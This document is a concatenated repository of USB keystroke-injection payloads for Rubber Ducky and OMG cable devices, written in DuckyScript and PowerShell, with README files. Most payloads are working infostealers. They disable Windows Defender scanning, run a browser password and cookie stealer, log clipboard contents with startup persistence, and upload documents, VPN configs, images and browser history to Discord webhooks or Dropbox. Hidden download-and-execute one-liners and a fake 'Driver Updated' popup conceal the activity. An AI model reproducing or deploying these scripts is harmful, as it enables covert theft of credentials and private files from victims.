download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: OMG/payloads/Water-UnMark/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Water-UnMark A payload to get rid of the ugly windows activation watermark. ## Description This script will get rid of the ugly windows watermark. This script will automatically reboot the device. This is not activating your computer!! ## Getting Started ### Dependencies * Unactivated Windows 10

(back to top)

### Executing program * Plug in your device ``` Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\svsvc" -Name Start -Value 4 -Force ```

(back to top)

## Contributing All contributors names will be listed here: [atomiczsec](https://github.com/atomiczsec)

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: OMG/payloads/Water-UnMark/payload.txt ================================================ REM Title: Water-UnMark REM Author: atomiczsec REM Target OS: Windows 10 REM Description: This script will get rid of the ugly windows watermark. This script will automatically reboot the device. This is not activating your computer!! DELAY 2000 GUI r DELAY 100 STRING powershell Start-Process powershell -verb runAs DELAY 1000 ALT Y DELAY 1000 STRING Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\svsvc" -Name Start -Value 4 -Force ENTER DELAY 100 STRING Restart-Computer -Force ENTER ================================================ FILE: OMG/payloads/Water-UnMark/placeholder ================================================ ================================================ FILE: OMG/payloads/cApS-Troll/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# cApS-Troll This payload is meant to prank your victim with TURNING on AND off CAPS LOCK ## Description This payload is meant to prank your victim with TURNING on AND off CAPS LOCK ## Getting Started ### Dependencies * Pastebin or other file sharing service, Discord webhook or other webhook service * Windows 10,11 * [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks

(back to top)

### Executing program * Plug in your device * Define the `DEFINE TARGET_URL example.com` * Device will download both files and place them in proper directories to then run the script ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr TARGET_URL dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here: [atomiczsec](https://github.com/atomiczsec) & [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: OMG/payloads/cApS-Troll/a.ps1 ================================================ while (1){ Start-Sleep -Second 45 $wsh = New-Object -ComObject WScript.Shell $wsh.SendKeys('{CAPSLOCK}') Start-Sleep -Second 15 $wsh = New-Object -ComObject WScript.Shell $wsh.SendKeys('{CAPSLOCK}') Start-Sleep -Second 15 $wsh = New-Object -ComObject WScript.Shell $wsh.SendKeys('{CAPSLOCK}') Start-Sleep -Second 15 $wsh = New-Object -ComObject WScript.Shell $wsh.SendKeys('{CAPSLOCK}') Start-Sleep -Second 15 $wsh = New-Object -ComObject WScript.Shell $wsh.SendKeys('{CAPSLOCK}') } ================================================ FILE: OMG/payloads/cApS-Troll/payload.txt ================================================ REM Title: cApS-Troll REM Author: atomiczsec REM Description: This payload is meant to prank your victim with TURNING on AND off CAPS LOCK REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: OMG/payloads/placeholder ================================================ ================================================ FILE: README.md ================================================ # Hak5 & FlipperZero HID Attack Payloads & Functions This repository contains payloads designed for various hardware hacking tools, including the USB Rubber Ducky, Bash Bunny, OMG cable, and FlipperZero. Primarily written in PowerShell and Duckyscript, these languages are commonly used for developing such payloads. If you have questions or need help, contact me using the information in this README. These payloads can automate processes, execute commands, or exploit system vulnerabilities, making them useful for penetration testing, cybersecurity research, and interacting with computer systems.
### Quick Refrence
To learn more about Hak5 or the Flipper Zero , please visit their websites: - www.hak5.org - www.flipperzero.one DISCLAIMER: This repository is for educational purposes only and is not intended for real-world usage. The creators of this repository are not responsible for any harm or damage that may occur as a result of using the information or code provided in this repository. By accessing and using this repository, you acknowledge and agree that you do so at your own risk. ================================================ FILE: RubberDucky/payloads/Bookmark-Hog/BH.ps1 ================================================ #Bookmark-Hog # See if file is a thing Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf #If the file does not exist, write to host. if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf)) { try { Write-Host "The chrome bookmark file has not been found. " } catch { throw $_.Exception.Message } } # Copy Chrome Bookmarks to Bash Bunny else { $F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_bookmarks.txt" Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -Destination "$env:tmp/$F1" } # See if file is a thing Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf #If the file does not exist, write to host. if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf)) { try { Write-Host "The edge bookmark file has not been found. " } catch { throw $_.Exception.Message } } # Copy Chrome Bookmarks to Bash Bunny else { $F2 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_bookmarks.txt" Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$env:tmp/$F2" } function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR ACCESS TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } DropBox-Upload -f "$env:tmp/$F1" DropBox-Upload -f "$env:tmp/$F2" $done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1) ================================================ FILE: RubberDucky/payloads/Bookmark-Hog/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Bookmark-Hog A payload to exfiltrate bookmarks of the 2 most popular browsers ## Description This payload will enumerate through the browser directories, looking for the file that stores the bookmark history These files will be saved to the temp directory Finally dropbox will be used to exfiltrate the files to cloud storage ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Windows 10,11

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: RubberDucky/payloads/Bookmark-Hog/payload.txt ================================================ REM Title: Bookmark-Hog REM Author: atomiczsec REM Description: This payload is meant to exfiltrate bookmarks to the rubber ducky REM Target: Windows 10, 11 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: RubberDucky/payloads/Browser-Grab/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Browser-Grab A payload to exfiltrate bookmarks, passwords, history and cookies of most popular browsers ## Description This payload will exclude the C: drive on the device so Windows Defender doesnt flag the exe This payload will then download an exe designed to exfiltrate bookmarks, passwords, history and cookies of most popular browsers Credits to the exe: https://github.com/moonD4rk/HackBrowserData Finally, discord will be used to exfiltrate the files to cloud storage ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Admin privileges on the Device you are targeting * Windows 10,11

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass iwr ?dl=1 | iex ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby) * [Author of EXE](https://github.com/moonD4rk/HackBrowserData)

(back to top)

================================================ FILE: RubberDucky/payloads/Browser-Grab/b.ps1 ================================================ function Upload-Discord { [CmdletBinding()] param ( [parameter(Position=0,Mandatory=$False)] [string]$file, [parameter(Position=1,Mandatory=$False)] [string]$text ) $hookurl = 'YOUR-DISCORD-WEBHOOK' $Body = @{ 'username' = $env:username 'content' = $text } if (-not ([string]::IsNullOrEmpty($text))){ Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)}; if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl} } # Add $env:tmp to exlusions so Windows Defender doesnt flag the exe we will download Add-MpPreference -ExclusionPath $env:tmp # Download the exe and save it to temp directory iwr "https://github.com/atomiczsec/My-Payloads/blob/main/Assets/browser.exe?raw=true" -outfile "$env:tmp\browser.exe" # Execute the Browser Stealer cd $env:tmp;Start-Process -FilePath "$env:tmp\browser.exe" -WindowStyle h -Wait # Exfiltrate the loot to discord Compress-Archive -Path "$env:tmp\results" -DestinationPath $env:tmp\browserdata.zip Upload-Discord -file "$env:tmp\browserdata.zip" ================================================ FILE: RubberDucky/payloads/Browser-Grab/payload.txt ================================================ REM Title: Browser-Grab REM Author: atomiczsec REM Description: A payload to exfiltrate bookmarks, passwords, history and cookies of most popular browsers REM Target: Windows 10 DELAY 2000 GUI r DELAY 1000 STRINGLN powershell saps powershell -verb runas DELAY 1000 ALT y DELAY 1000 STRINGLN irm https:// ?dl=1 | iex REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly ================================================ FILE: RubberDucky/payloads/Copy-And-Waste/I.bat ================================================ @echo off powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}" pause ================================================ FILE: RubberDucky/payloads/Copy-And-Waste/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Copy-And-Waste A payload to exfiltrate clipboard contents ## Description This payload uses iwr to download 2 files * I.bat * c.ps1 **I.bat** is downloaded to the startup folder to maintain persistance and execute c.ps1 on reboot/startup **c.ps1** will sit in AppData\Roaming folder, waiting for a Ctrl + C or Ctrl + X click Then the contents will then be sent to the discord webhook for viewing pleasure For killing the script press both Ctrl buttons at the same time [It will resume at reboot] ## Getting Started ### Dependencies * Pastebin or other file sharing service, Discord webhook or other webhook service * Windows 10,11 * [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks

(back to top)

### Executing program * Plug in your device * Device will download both files and place them in proper directories to then run the script ``` powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1"" ```

(back to top)

## Contributing All contributors names will be listed here: [atomiczsec](https://github.com/atomiczsec) & [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: RubberDucky/payloads/Copy-And-Waste/c.ps1 ================================================ Add-Type -AssemblyName WindowsBase Add-Type -AssemblyName PresentationCore function dischat { [CmdletBinding()] param ( [Parameter (Position=0,Mandatory = $True)] [string]$con ) $hookUrl = 'YOUR DISCORD WEBHOOK' $Body = @{ 'username' = $env:username 'content' = $con } Invoke-RestMethod -Uri $hookUrl -Method 'post' -Body $Body } dischat (get-clipboard) while (1){ $Lctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'LeftCtrl') $Rctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::RightCtrl) $cKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::c) $xKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::x) if (($Lctrl -or $Rctrl) -and ($xKey -or $cKey)) {dischat (Get-Clipboard)} elseif ($Rctrl -and $Lctrl) {dischat "---------connection lost----------";exit} else {continue} } ================================================ FILE: RubberDucky/payloads/Copy-And-Waste/payload.txt ================================================ REM Title: Copy-And-Waste REM Author: atomiczsec & I am Jakoby REM Description: This payload is meant to exfiltrate whatever is copied to the clipboard and sends to a discord webhook REM Target: Windows 10, 11 DELAY 2000 GUI DELAY STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1"" ENTER REM Remember to replace the link with your pastebin shared link for the intended files to download REM Also remember to put in your discord webhook in c.ps1 REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH ================================================ FILE: RubberDucky/payloads/Copy-And-Waste/placeholder ================================================ ================================================ FILE: RubberDucky/payloads/De-Bloater/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# De-Bloater A payload to quickly get "Windows10Debloater" ## Description This script will download "Windows10Debloater" - Script/Utility/Application to debloat Windows 10, to remove Windows pre-installed unnecessary applications, stop some telemetry functions, stop Cortana from being used as your Search Index, disable unnecessary scheduled tasks, and more... ## Getting Started ### Dependencies * Windows 10

(back to top)

### Executing program * Plug in your device ``` iwr -useb https://git.io/debloat|iex ```

(back to top)

## Contributing All contributors names will be listed here: [atomiczsec](https://github.com/atomiczsec) [Sycnex](https://github.com/Sycnex/Windows10Debloater) [I am Jakoby](https://github.com/I-Am-Jakoby/Powershell-to-Ducky-Converter)

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby) * [Sycnex - Creator Of The Tool](https://github.com/Sycnex/Windows10Debloater)

(back to top)

================================================ FILE: RubberDucky/payloads/Doc-Hog/d.ps1 ================================================ function Doc-Hog { [CmdletBinding()] param ( [parameter(Position=0,Mandatory=$False)] [string]$file, [parameter(Position=1,Mandatory=$False)] [string]$text ) $hookurl = 'DISCORD-WEBHOOK' $Body = @{ 'username' = $env:username 'content' = $text } if (-not ([string]::IsNullOrEmpty($text))) { Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json) } if (-not ([string]::IsNullOrEmpty($file))) { curl.exe -F "file1=@$file" $hookurl } } $Files = Get-ChildItem -Path "$env:HOMEPATH" -Include "*.docx","*.doc","*.pptx","*.xlsx","*.pdf","*.jpeg","*.png","*.jpg","*.csv","*.txt" -Recurse $types = @{ "*.docx" = "Word"; "*.doc" = "Word"; "*.pptx" = "PowerPoint"; "*.xlsx" = "Excel"; "*.pdf" = "PDF"; "*.jpeg" = "JPEG"; "*.png" = "PNG"; "*.jpg" = "JPEG"; "*.csv" = "CSV"; "*.txt" = "Text"; } foreach ($type in $types.Keys) { $filteredFiles = $Files | Where-Object {$_.Name -like $type} if ($filteredFiles) { $zipFile = "$env:TEMP\$($types[$type]).zip" $filteredFiles | Compress-Archive -DestinationPath $zipFile Doc-Hog -file $zipFile -text "Uploading $($types[$type]) files" } } ================================================ FILE: RubberDucky/payloads/Doc-Hog/payload.txt ================================================ REM Title: Doc-Hog REM Author: atomiczsec REM Description: This payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook. DEFINE URL http://new-url.com/powershell.ps1 REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr $URL dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: RubberDucky/payloads/Doc-Hog/readme.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Doc-Hog A payload to exfiltrate all files like, PNG, DOCX, PDF, TXT, Excel, JPEG, and CSV ## Description This payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook. ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Windows 10,11

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact
Link

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: RubberDucky/payloads/History-Pig/HP.ps1 ================================================ #History-Pig # See if file is a thing Test-Path -Path "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History" -PathType Leaf #If the file does not exist, write to host. if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History" -PathType Leaf)) { try { Write-Host "The Chrome History file has not been found. " } catch { throw $_.Exception.Message } } # Copy Chrome History to Temp Directory to get sent to Dropbox else { $F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_history" Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History" -Destination "$env:tmp/$F1" } # See if file is a thing Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -PathType Leaf #If the file does not exist, write to host. if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -PathType Leaf)) { try { Write-Host "The Edge History file has not been found. " } catch { throw $_.Exception.Message } } # Copy Edge History to Temp Directory to get sent to Dropbox else { $F2 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_history" Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -Destination "$env:tmp/$F2" } function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "ADD-YOUR-DROPBOX-TOKEN-HERE" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } DropBox-Upload -f "$env:tmp/$F1" DropBox-Upload -f "$env:tmp/$F2" $done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1) ================================================ FILE: RubberDucky/payloads/History-Pig/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# History-Pig A payload to exfiltrate the history of the 2 most popular browsers ## Description This payload will enumerate through the browser directories, looking for the file that stores the history These files will be saved to the temp directory Finally dropbox will be used to exfiltrate the files to cloud storage ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Windows 10,11

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: RubberDucky/payloads/History-Pig/payload.txt ================================================ REM Title: History-Pig REM Author: atomiczsec REM Description: This payload is meant to exfiltrate browsers history to a dropbox REM Target: Windows 10, 11 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: RubberDucky/payloads/OVPN-Hog/o.ps1 ================================================ function OVPN-Hog { [CmdletBinding()] param ( [parameter(Position=0,Mandatory=$False)] [string]$file, [parameter(Position=1,Mandatory=$False)] [string]$text ) $hookurl = 'DISCORD-WEBHOOK' $Body = @{ 'username' = $env:username 'content' = $text } if (-not ([string]::IsNullOrEmpty($text))) { Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json) } if (-not ([string]::IsNullOrEmpty($file))) { curl.exe -F "file1=@$file" $hookurl } } $Drive = "C:" $Files = Get-ChildItem -Path $Drive -Filter "*.ovpn" -File -Recurse if ($Files) { $types = @{ "*.ovpn" = "OpenVPN" } foreach ($type in $types.Keys) { $filteredFiles = $Files | Where-Object { $_.Name -like $type } if ($filteredFiles) { $zipFile = Join-Path -Path $env:TEMP -ChildPath "$($types[$type]).zip" $filteredFiles | Compress-Archive -DestinationPath $zipFile OVPN-Hog -file $zipFile -text "Uploading $($types[$type]) files" } } } ================================================ FILE: RubberDucky/payloads/OVPN-Hog/payload.txt ================================================ REM Title: Doc-Hog REM Author: atomiczsec REM Description: This payload will enumerate through the files looking for ".ovpn" files. Then create ZIPs with them, then send to a discord webhook. DEFINE URL http://new-url.com/powershell.ps1 REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr $URL dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: RubberDucky/payloads/OVPN-Hog/readme.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# OVPN-Hog A PowerShell script to search for and exfiltrate OpenVPN configuration files (.ovpn). ## Description This script searches the entire C: drive of a Windows 10 or 11 machine for OpenVPN configuration files with the .ovpn extension. It then creates a zip archive containing the discovered files and uploads it to a Discord webhook. ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Windows 10,11

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact
Link

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: RubberDucky/payloads/Picture-Hog/p.ps1 ================================================ function Upload-Discord { [CmdletBinding()] param ( [parameter(Position=0,Mandatory=$False)] [string]$file, [parameter(Position=1,Mandatory=$False)] [string]$text ) $hookurl = 'YOUR-DISCORD-WEBHOOK' $Body = @{ 'username' = $env:username 'content' = $text } if (-not ([string]::IsNullOrEmpty($text))){ Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)}; if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl} } # Enumerate all .png and .jpg files in the current user's home directory and all subdirectories $Files = Get-ChildItem -Path "$env:HOMEPATH" -Include "*.png","*.jpg" -Recurse # Iterate through each file foreach ($File in $Files) { # Get the file name and file path $FileName = $File.Name $FilePath = $File.FullName # Call the Upload-Discord function, passing the file path and file name as arguments Upload-Discord -file $FilePath } ================================================ FILE: RubberDucky/payloads/Picture-Hog/placeholder ================================================ ================================================ FILE: RubberDucky/payloads/Powershell-History/PH.ps1 ================================================ #Powershell-History # See if file is a thing Test-Path -Path "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -PathType Leaf #If the file does not exist, write to host. if (-not(Test-Path -Path "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -PathType Leaf)) { try { Write-Host "The Powershell History file has not been found. " } catch { throw $_.Exception.Message } } # Copy Powershell History to Temp Directory to get sent to Dropbox else { $F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_ps_history.txt" Copy-Item "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Destination "$env:tmp/$F1" } function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } DropBox-Upload -f "$env:tmp/$F1" $done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1) ================================================ FILE: RubberDucky/payloads/Powershell-History/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Powershell-History A payload to exfiltrate the history of the powershell console ## Description This payload will enumerate through the powershell directories, looking for the file that stores the history of the powershell console These files will be saved to the temp directory Finally dropbox will be used to exfiltrate the files to cloud storage ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Windows 10

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

